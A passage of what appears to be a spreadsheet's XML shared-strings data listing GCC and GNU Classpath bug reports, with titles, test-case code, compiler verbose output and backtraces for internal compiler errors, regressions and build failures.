            boxjmp = PBCy*INT(X0(2i)+SIGN(HALfX0(2i)))
            X0(2i) = X0(2i) - boxjmp
            boxjmp = PBCz*INT(X0(3i)+SIGN(HALfX0(3i)))
            X0(3i) = X0(3i) - boxjmp
         ENDDO
      END</t>
  </si>
  <si>
    <t>GCC-78152</t>
  </si>
  <si>
    <t>[6/7/8 Regression] coarray and associate</t>
  </si>
  <si>
    <t>The following source file bug.f90 is rejected by gfortran version 7 and 6.
Gfortran version 5.4 compiles the code. I believe this is a regression.
cat bug.f90
program co_assoc
  implicit none
  integer parameter :: p = 5
  real allocatable :: a(::)[::]
  allocate (a(pp)[2*])
  associate (i =&gt; a(1:p 1:p))
  end associate
end program co_assoc
LANG=C caf -o bug bug.f90 -W -Wall -v
mpifort for MPICH version 3.1.4
Driving: gfortran-7 -Wl-flat_namespace -o bug bug.f90 -W -Wall -v -L /Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/lib -fcoarray=lib -lcaf_mpi -I/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include -I/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include -L/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/lib -lmpifort -lmpi -lpmpi -mmacosx-version-min=10.9.4 -l gfortran -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran-7
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin13.4.0/7.0.0/lto-wrapper
Target: x86_64-apple-darwin13.4.0
Configured with: ../gcc/configure --enable-languages=cc++fortranlto --with-gmp=/sw --with-libiconv-prefix=/sw --with-isl=/sw --with-mpc=/sw --with-system-zlib --program-suffix=-7
Thread model: posix
gcc version 7.0.0 20161025 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-o' 'bug' '-Wextra' '-Wall' '-v' '-L/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/lib' '-fcoarray=lib' '-I' '/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include' '-I' '/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include' '-L/Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/lib' '-mmacosx-version-min=10.9.4' '-shared-libgcc' '-mtune=core2'
 /usr/local/libexec/gcc/x86_64-apple-darwin13.4.0/7.0.0/f951 bug.f90 -I /Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include -I /Users/Peter/Downloads/tmp/opencoarrays/prerequisites/installations/mpich/3.1.4/include -fPIC -quiet -dumpbase bug.f90 -mmacosx-version-min=10.9.4 -mtune=core2 -auxbase bug -Wextra -Wall -version -fcoarray=lib -fintrinsic-modules-path /usr/local/lib/gcc/x86_64-apple-darwin13.4.0/7.0.0/finclude -o /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc7JcB1e.s
GNU Fortran (GCC) version 7.0.0 20161025 (experimental) (x86_64-apple-darwin13.4.0)
	compiled by GNU C version 7.0.0 20161025 (experimental) GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version 0.15
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU Fortran2008 (GCC) version 7.0.0 20161025 (experimental) (x86_64-apple-darwin13.4.0)
	compiled by GNU C version 7.0.0 20161025 (experimental) GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version 0.15
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
bug.f90:6:29:
   associate (i =&gt; a(1:p 1:p))
                             1
Error: Variable 'i' at (1) is a coarray and is not ALLOCATABLE SAVE nor a dummy argument
gcc-5.4:
mpifort for MPICH version 3.1.4
Driving: gfortran-fsf-5 -mmacosx-version-min=10.9.4 -Wl-flat_namespace -o bug bug.f90 -W -Wall -v -L /Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib -fcoarray=lib -lcaf_mpi -I/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include -I/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include -L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib -lmpifort -lmpi -lpmpi -l gfortran -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran-fsf-5
COLLECT_LTO_WRAPPER=/sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/5.4.0/lto-wrapper
Target: x86_64-apple-darwin13.4.0
Configured with: ../gcc-5.4.0/configure --prefix=/sw --prefix=/sw/lib/gcc5 --mandir=/sw/share/man --infodir=/sw/lib/gcc5/info --enable-languages=cc++fortranltoobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-isl=/sw --with-mpc=/sw --with-system-zlib --program-suffix=-fsf-5
Thread model: posix
gcc version 5.4.0 (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.9.4' '-o' 'bug' '-Wextra' '-Wall' '-v' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib' '-fcoarray=lib' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib' '-shared-libgcc' '-mtune=core2'
 /sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/5.4.0/f951 bug.f90 -I /Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include -I /Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include -fPIC -quiet -dumpbase bug.f90 -mmacosx-version-min=10.9.4 -mtune=core2 -auxbase bug -Wextra -Wall -version -fcoarray=lib -fintrinsic-modules-path /sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/finclude -o /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//ccNZlpo1.s
GNU Fortran (GCC) version 5.4.0 (x86_64-apple-darwin13.4.0)
	compiled by GNU C version 5.4.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran2008 (GCC) version 5.4.0 (x86_64-apple-darwin13.4.0)
	compiled by GNU C version 5.4.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.9.4' '-o' 'bug' '-Wextra' '-Wall' '-v' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib' '-fcoarray=lib' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib' '-shared-libgcc' '-mtune=core2'
 as -arch x86_64 -force_cpusubtype_ALL -o /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc2yTmpr.o /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//ccNZlpo1.s
Reading specs from /sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/../../../libgfortran.spec
rename spec lib to liborig
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.9.4' '-o' 'bug' '-Wextra' '-Wall' '-v' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib' '-fcoarray=lib' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib' '-shared-libgcc' '-mtune=core2'
COMPILER_PATH=/sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/5.4.0/:/sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/5.4.0/:/sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/:/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/:/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/
LIBRARY_PATH=/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/:/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/../../../:/usr/lib/
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.9.4' '-o' 'bug' '-Wextra' '-Wall' '-v' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib' '-fcoarray=lib' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-I' '/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/include' '-L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib' '-shared-libgcc' '-mtune=core2'
 /sw/lib/gcc5/libexec/gcc/x86_64-apple-darwin13.4.0/5.4.0/collect2 -dynamic -arch x86_64 -macosx_version_min 10.9.4 -weak_reference_mismatches non-weak -o bug -L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib -L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib -L/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0 -L/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/../../.. -flat_namespace /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc2yTmpr.o -lcaf_mpi -lmpifort -lmpi -lpmpi -lgfortran -no_compact_unwind -lSystem -lgcc_ext.10.5 -lgcc -lquadmath -lm -lgcc_ext.10.5 -lgcc -lSystem -v
collect2 version 5.4.0
/usr/bin/ld -dynamic -arch x86_64 -macosx_version_min 10.9.4 -weak_reference_mismatches non-weak -o bug -L/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib -L/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib -L/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0 -L/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0/../../.. -flat_namespace /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc2yTmpr.o -lcaf_mpi -lmpifort -lmpi -lpmpi -lgfortran -no_compact_unwind -lSystem -lgcc_ext.10.5 -lgcc -lquadmath -lm -lgcc_ext.10.5 -lgcc -lSystem -v
@(#)PROGRAM:ld  PROJECT:ld64-241.9
configured to support archs: armv6 armv7 armv7s arm64 i386 x86_64 x86_64h armv6m armv7m armv7em
Library search paths:
	/Users/Peter/Downloads/OpenCoarrays-1.4.0/opencoarrays-build/lib
	/Users/Peter/Downloads/OpenCoarrays-1.4.0/install_prerequisites/mpich-3.1.4-installation/lib
	/sw/lib/gcc5/lib/gcc/x86_64-apple-darwin13.4.0/5.4.0
	/sw/lib/gcc5/lib
	/usr/lib
	/usr/local/lib
Framework search paths:
	/Library/Frameworks/
	/System/Library/Frameworks/
 /usr/bin/nm -n /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc2yTmpr.o</t>
  </si>
  <si>
    <t>GCC-41474</t>
  </si>
  <si>
    <t>[4.5 Regression] 951116-1.c ICEs in mem_loc_descriptor at dwarf2out.c:11279</t>
  </si>
  <si>
    <t>I've got an ICE with gcc.c-torture/compile/951116-1.c test
on sh64-unknown-linux-gnu and powerpc64-unknown-linux-gnu.
On powerpc64-unknown-linux-gnu with -O -g -m64
951116-1.c: In function 'f':
951116-1.c:9:1: internal compiler error: in mem_loc_descriptor at dwarf2out.c:11279
#1  0x081eb506 in mem_loc_descriptor (rtl=0xb7f67360 mode=TImode 
    initialized=VAR_INIT_STATUS_INITIALIZED)
    at ../../LOCAL/trunk/gcc/dwarf2out.c:11279
11279	      gcc_unreachable ()
(gdb) call debug_rtx(rtl)
(concatn:TI [
        (reg:DI 126 [ FRAME.1 ])
        (reg:DI 127 [ FRAME.1+8 ])
    ])
I've got it for revision 152109.</t>
  </si>
  <si>
    <t>GCC-68607</t>
  </si>
  <si>
    <t>Internal compiler error with generic lambda and constexpr</t>
  </si>
  <si>
    <t>The following C++14 file produces an internal compiler error.
int main() {
  constexpr int k = 0
  auto f = [&amp;](auto param) {
    if (param == k) {
    }
  }
  f(0)
  return 0
}
icp.cpp: In instantiation of â€˜main():: [with auto:1 = int]â€™:
icp.cpp:10:6:   required from here
icp.cpp:2:5: internal compiler error: in tsubst_decl at cp/pt.c:10836
 int main() {
     ^
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc-multilib/src/gcc-5.2.0/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release --with-default-libstdcxx-abi=gcc4-compatible
Thread model: posix
gcc version 5.2.0 (GCC)</t>
  </si>
  <si>
    <t>paulourio</t>
  </si>
  <si>
    <t>GCC-3110</t>
  </si>
  <si>
    <t>Followup to bug 3072 maybe 3019 too</t>
  </si>
  <si>
    <t>Compiling attached mff.mi file gives ICE
Release:
3.0 20010528 (prerelease)
Environment:
System: Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure
How-To-Repeat:
1) Download gcc snapshot from www.codesourcery.com
2) Install
3) /usr/local/bin/gcc -v
4) /usr/local/bin/gcc mff.mi</t>
  </si>
  <si>
    <t>jones.peter</t>
  </si>
  <si>
    <t>GCC-50689</t>
  </si>
  <si>
    <t>AIX bootstrap failure from cgraphunit.c aliases change</t>
  </si>
  <si>
    <t>Created attachment 25454
Pre-processed file that is miscompiled
The patch to cgraphunit.c forcing aliases to be output when cgraph decides so causes an AIX bootstrap failure.  The patch shifts the output of the aliases in the assembly file to earlier in the file before the definition.  AIX assembler is a single pass assembler and does not allow forward references.</t>
  </si>
  <si>
    <t>GCC-7196</t>
  </si>
  <si>
    <t>Re: ObjC PR/6328</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; Hi Nicola
 &gt; 
 &gt; in fact my bug report was bugged !!
 &gt; 
 &gt; The real problem is described below and the test case is attached.
 &gt; 
 &gt; When classes are defined in an external static library you must
 &gt; explicitly ask the Objc-Runtime to reference them or it is not aware of
 &gt; their existence.
 &gt; 
 &gt; To do so we are calling +initialize manually on those classes. In this
 &gt; specific case the Objc-Runtime does not prevent further calls and will
 &gt; issue a second +initialize when trying to instanciate those classes.
 Thanks - very interesting indeed (the testcase was great :-) ).
 My suggestion is simply to use
  [B class]
 instead of 
  [B initialize]
 to have B referenced by the ObjC runtime ... that will cause the runtime
 to automatically drag in B and also call +initialize (should be
 guaranteed once) and everything will work happily.
 I think this is the proper way of dragging in classes and when I changed
 the testcase to do it the runtime seemed to behave very properly.
 Let me know if you are happy with this solution or if I have missed
 something.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-56609</t>
  </si>
  <si>
    <t>[C++11] Several type traits give incorrect results for std::nullptr_t</t>
  </si>
  <si>
    <t>The following code is rejected when compiled with gcc 4.8.0 20130310 (experimental) or with gcc 4.7.2 using the flags
-Wall -std=c++11 -pedantic
//--------------------------------------------------
#include 
typedef decltype(nullptr) np_t
static_assert(std::is_scalar::value )
static_assert(!std::is_class::value )
static_assert(std::is_fundamental::value ) // #7
static_assert(!std::is_compound::value ) // #8
//--------------------------------------------------
7|error: static assertion failed: |
8|error: static assertion failed: |
According to 3.9 p9 std::nullptr_t is a scalar type I also read 3.9.1 p10 that it is a fundamental type. This is confirmed by 3.9.2 not listing anything that can be applied to std::nullptr_t.
I think the code should be accepted.</t>
  </si>
  <si>
    <t>GCC-38196</t>
  </si>
  <si>
    <t>num_put::do_put(bool) performs 'internal' padding incorrectly when boolalpha==true</t>
  </si>
  <si>
    <t>The description of num_put::do_put(bool) function states (22.2.2.2.2): 
iter_type do_put(iter_type out ios_base
Effects: If (str.flags()&amp;ios_base::boolalpha)==0 then do
out = do_put(out str fill (int)val)
Otherwise do
const numpunct
string_type s = val ? np.truename() : np.falsename()
and then insert the characters of s into out.
It is not specified how exactly the insertion the characters of s into out iterator is performed. It seems that the padding of the string is done the same way as for the other functions from num_put::do_put() family namely (22.2.2.2.2 p19 Table 61): 
adjustfield == iosbase::left - pad after
adjustfield == iosbase::right - pad before
adjustfield == internal and a sign occurs in the representation - pad after the sign
adjustfield == internal and representation after stage 1 began with 0x or 0X - pad after x or X 
otherwise pad before
num_put::do_put(bool) however should output a string that in general is not a string representation of some number. It makes no sense for a string that can be arbitrary to process the sign symbols 0x or 0X in a different way than its other substrings. That means the 'internal' flag should be functionally equivalent to 'right' (pad before) in this case. 
This is exactly the way the operator for inserting sequences of symbols into a stream (operator::do_put in practice the 'internal' flag is functionally equivalent to 'right' in this case which makes sense. 
However the implementation of num_put::do_put(bool) performs 'internal' padding not like operator::do_put family: it inserts fill symbols between the 'sign' or 0x/0X and the rest of the string.</t>
  </si>
  <si>
    <t>GCC-32003</t>
  </si>
  <si>
    <t>Undocumented -fdump-tree options</t>
  </si>
  <si>
    <t>Those 2 options:
  {stmtaddr TDF_STMTADDR}
  {memsyms TDF_MEMSYMS}
aren't documented.</t>
  </si>
  <si>
    <t>GCC-27488</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] ICE in tree_expr_nonnegative_p</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.1.0:
====================================================
extern double frexp (double x int *e)
extern double fabs (double x)
void foo(int *p)
{
    fabs(frexp(0.. p))
}
====================================================
bug.c:6:16: error: too many decimal points in number
bug.c: In function 'foo':
bug.c:6: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in tree_expr_nonnegative_p at fold-const.c:11776
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-5895</t>
  </si>
  <si>
    <t>template inheritance in std library</t>
  </si>
  <si>
    <t>The following code causes the compiler to segfault.
#include 
#include 
class nullbuf: public std::basic_streambuf {}
template class null_iostream : public std::basic_iostream
{
public:
  null_iostream(nullbuf* b)
    : std::basic_iostream(b) {}
  //                 ^^^^^^^^^ internal compiler segfault
  //                    required. Should report error
}
int main(int char*[])
{
  nullbuf nb
  null_iostream ns(
  ns &lt;&lt; Hello! &lt;&lt; std::endl
  return 0
}
Release:
3.0.4
Environment:
Linux vladimir 2.4.16 #1 Fri Feb 15 16:43:57 EST 2002 i586 unknown
Debian woody
Configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.0.4
How-To-Repeat:
g++-3.0 -Wall nstream.cpp</t>
  </si>
  <si>
    <t>karlm</t>
  </si>
  <si>
    <t>GCC-69110</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] execution failure in gcc.c-torture/execute/doloop-{12}.c with -ftree-parallelize-loops=2</t>
  </si>
  <si>
    <t>Passes with -ftree-parallelize-loops=0:
...
$ gcc src/gcc/testsuite/gcc.c-torture/execute/doloop-2.c -O1 -ftree-parallelize-loops=0 -Wl-rpath=$(pwd -P)/install/lib64
$ ./a.out 
$
...
Fails with -ftree-parallelize-loops=2:
...
$ gcc src/gcc/testsuite/gcc.c-torture/execute/doloop-2.c -O1 -ftree-parallelize-loops=2 -Wl-rpath=$(pwd -P)/install/lib64
$ ./a.out 
Aborted (core dumped)
$
...</t>
  </si>
  <si>
    <t>GCC-25413</t>
  </si>
  <si>
    <t>wrong alignment or incorrect address computation in vectorized code on Pentium 4 SSE</t>
  </si>
  <si>
    <t>(The same phenomenon happens in 4.2 subversion alpha.)
Incorrect code is generated when using -ftree-vectorize on the SSE2 Pentium 4 target. (The same code works on the AMD64 64-bit target.)
See attached source code.
$ gcc -O2 -Wall -march=pentium4 -mfpmath=sse -ftree-vectorize -ftree-vectorizer-verbose=1 gcc_plantage2.c -o ./gcc_plantage2
$ ./gcc_plantage2
will segfault (the same program works perfectly without -ftree-vectorize).
The segfault appears at the second movapd instruction:
	movapd	.LC0 %xmm0
.L17:
	movapd	%xmm0 (%eax)
	addl	$1 %edx
	addl	$16 %eax
	cmpl	%edx %ebx
	ja	.L17
%eax is at this point equal to 4 modulo 16 which results in a segmentation fault since movapd assumes 16-byte alignment.</t>
  </si>
  <si>
    <t>David.Monniaux</t>
  </si>
  <si>
    <t>GCC-57584</t>
  </si>
  <si>
    <t>[4.9 Regression] ice: SSA corruption: Unable to coalesce ssa_names</t>
  </si>
  <si>
    <t>Created attachment 30289
gzipped C source code
The attached source code causes the following crash
on gcc-4.9 trunk dated 20130605 on an AMD x86_64 box
when compiled with -O3.
Unable to coalesce ssa_names 45 and 3671 which are marked as MUST COALESCE.
sp_45(ab) and  sp_3671(ab)
In file included from vm.c:661:0:
vm-engine.c: In function â€˜vm_debug_engineâ€™:
vm-engine.c:39:1: internal compiler error: SSA corruption
0x9ca5bf fail_abnormal_edge_coalesce
    ../../src/trunk/gcc/tree-ssa-coalesce.c:898
0x9ca5bf coalesce_partitions
    ../../src/trunk/gcc/tree-ssa-coalesce.c:1200
0x9ca5bf coalesce_ssa_name()
    ../../src/trunk/gcc/tree-ssa-coalesce.c:1337
0x981cee remove_ssa_form
    ../../src/trunk/gcc/tree-outof-ssa.c:900
0x981cee rewrite_out_of_ssa(ssaexpand*)
    ../../src/trunk/gcc/tree-outof-ssa.c:1133
0x60c694 gimple_expand_cfg
    ../../src/trunk/gcc/cfgexpand.c:4541
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-8523</t>
  </si>
  <si>
    <t>gcc 3.2 hang after parse error (C++)</t>
  </si>
  <si>
    <t xml:space="preserve">	After detecting the parse error gcc hangs.
Release:
3.2
Environment:
System: Linux XXXXXX 2.4.16-4GB #1 Mit Okt 30 14:20:02 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.2/configure --prefix=/usr5/xhome/softw1/install-3.2 --enable-threads --enable-shared
How-To-Repeat:
   g++ 1.cc
   FILE 1.cc:
1 struct s {
2    void f ()
3    {
4       double t
5       for (int i = 2 i &gt;= 0 --i)
6          t += 
7    }
8 }</t>
  </si>
  <si>
    <t>GCC-81983</t>
  </si>
  <si>
    <t>libbacktrace calls bsearch with NULL base</t>
  </si>
  <si>
    <t>! sanitizer detects runtime error in libbacktrace
! This file MUST NOT be compiled with -g option
! Must be compiled with -fsanitize=addressundefined and sanitized libgfortran and libbacktrace
! libbacktrace/dwarf.c:2662:9: runtime error: null pointer passed as argument 2 which is declared to never be null
! dwarf.c:2662 entry = bsearch (&amp;pc ddata-&gt;addrs ddata-&gt;addrs_count
! ddata-&gt;addrs_count is probably zero so operation is undefined but harmless
! possible fix entry=NULL 
!               if(ddata-&gt;addrs_count) entry=bsearch (&amp;pc ddata-&gt;addrs ddata-&gt;addrs_count
      INTEGER ALLOCATABLE :: arr(:)
      ALLOCATE (arr(5))
      ALLOCATE (arr(6))
      END</t>
  </si>
  <si>
    <t>GCC-6630</t>
  </si>
  <si>
    <t>gcc-3.1 prerelease with -O3 generates invalid i386 code.</t>
  </si>
  <si>
    <t>Building the attached file from xmame-0.60.1 using -O3 -c produces these messages:
/tmp/cch0HcgE.s: Assembler messages:
/tmp/cch0HcgE.s:5613: Error: bad register name `%sil'
/tmp/cch0HcgE.s:5742: Error: bad register name `%sil'
/tmp/cch0HcgE.s:5858: Error: bad register name `%sil'
/tmp/cch0HcgE.s:5993: Error: bad register name `%sil'
/tmp/cch0HcgE.s:6230: Error: bad register name `%sil'
Release:
gcc-3.1 (GCC) 3.1 20020509 (prerelease)
Environment:
Linux 2.4.18 Athlon Thunderbird 1.2GHz (stepping 6) binutils v2.12 gcc-3.1 built (make bootstrap) using gcc-2.95.3 with CFLAGS and CXXFLAGS unset.  The problem also occurs if gcc-3.1 is built using gcc-3.0.4.</t>
  </si>
  <si>
    <t>gold</t>
  </si>
  <si>
    <t>GCC-10302</t>
  </si>
  <si>
    <t>Certain -D values cause gcc to issue strange errors</t>
  </si>
  <si>
    <t>Attached is a command line and test.c file which shows a strange error in gcc-3.2.2
gcc-3.2.1 compiles just fine.
Release:
gcc-3.2.2
Environment:
Solaris 2.5.1 or Solaris 8
How-To-Repeat:
Just run the gcc command on test.v</t>
  </si>
  <si>
    <t>warren.dodge</t>
  </si>
  <si>
    <t>GCC-24500</t>
  </si>
  <si>
    <t>Libjava failure: FAIL: ExtraClassLoader execution - gij test</t>
  </si>
  <si>
    <t>Gcc checked out at Sun Oct 23 16:06:13 UTC 2005 has
Exception in thread main java.lang.ClassNotFoundException: C not found in gnu.gcj.runtime.SystemClassLoader{urls=[file:./file:/net/gnu-13/export/gnu/src/gcc/gcc/libjava/testsuite/libjava.lang/file:/export/build/gnu/gcc/build-ia64-linux/ia64-unknown-linux-gnu/libjava/testsuite/file:/export/build/gnu/gcc/build-ia64-linux/ia64-unknown-linux-gnu/libjava/testsuite/../libgcj-4.1.0.jar] parent=gnu.gcj.runtime.ExtensionClassLoader{urls=[] parent=null}}
   at java.lang.VMThrowable (natVMThrowable.cc:33)
   at java.lang.Throwable (Throwable.java:498)
   at java.lang.Throwable (Throwable.java:159)
   at java.lang.Throwable (Throwable.java:173)
   at java.lang.Exception (Exception.java:89)
   at java.lang.ClassNotFoundException (ClassNotFoundException.java:96)
   at java.lang.ClassNotFoundException (ClassNotFoundException.java:83)
   at java.net.URLClassLoader (URLClassLoader.java:1058)
   at java.lang.ClassLoader (ClassLoader.java:317)
   at java.lang.ClassLoader (ClassLoader.java:260)
   at java.lang.Class (natClass.cc:88)
   at java.lang.Class (natClass.cc:108)
   at ExtraClassLoader (unix.S:344)
   at java.lang.Class (natClass.cc:656)
   at ExtraClassLoader (unix.S:344)
   at gnu.java.lang.MainThread (natMainThread.cc:47)
   at gnu.java.lang.MainThread (MainThread.java:105)
FAIL: ExtraClassLoader execution - gij test
UNTESTED: ExtraClassLoader output - gij test</t>
  </si>
  <si>
    <t>CLASSPATH-16824</t>
  </si>
  <si>
    <t>GdkPixbufDecoder crashes with image loading programs</t>
  </si>
  <si>
    <t>I found a strange segfault issue in programs that try to load/display images
(GIF/JPEG).
Mark and I have located the segfault to occur in
native/jni/gtk-peer/gnu_java_awt_peer_gtk_GdkPixbufDecoder.c Line 226. Here is
gdk_env used (which probably should be env instead). The real problem seems to
be that GTKToolkit is not yet initialized properly.
The following workaround seems to work though:
--- gnu/java/awt/peer/gtk/GdkPixbufDecoder.java 26 Jun 2004 16:06:47 -0000 1.5
+++ gnu/java/awt/peer/gtk/GdkPixbufDecoder.java 28 Jun 2004 20:34:49 -0000
@@ -576 +578 @@
System.loadLibrary(gtkpeer)
}
initStaticState ()
+ java.awt.Toolkit.getDefaultToolkit()
+ try { Thread.sleep(500) } catch (InterruptedException ignored) { }
}
native static void initStaticState ()
private final int native_state = GtkGenericPeer.getUniqueInteger ()
this means if we wait long enough for GTKToolkit to initialize the segfault
does not occur.
Any ideas how to fix this? Maybe I should add that I tried that with JamVM 1.1.4
/Roman
This bug report comes from GNU Classpath:
https://savannah.gnu.org/bugs/index.php?func=detailitem&amp;item_id=9484</t>
  </si>
  <si>
    <t>GCC-35942</t>
  </si>
  <si>
    <t>Self Reference In Dynamic Linked Library builds for building Cross-Compiler</t>
  </si>
  <si>
    <t>While building a cross-compiler the the libstdc++-v3 includes a copy of Libtool script which includes a reference to libstdc++ itself. This prevent the user to build a new compiler without existing libstdc++ for the target triplet.
The following is a patch that tested to be working for this problem but I think it should be done in a better way.
#######BEGIN OF PATCH CODE######
diff -Naur gcc-4.3-20080410.orig/libstdc++-v3/src/Makefile.in gcc-4.3-20080410/libstdc++-v3/src/Makefile.in
--- gcc-4.3-20080410.orig/libstdc++-v3/src/Makefile.in	2008-03-01 05:26:50.000000000 +1100
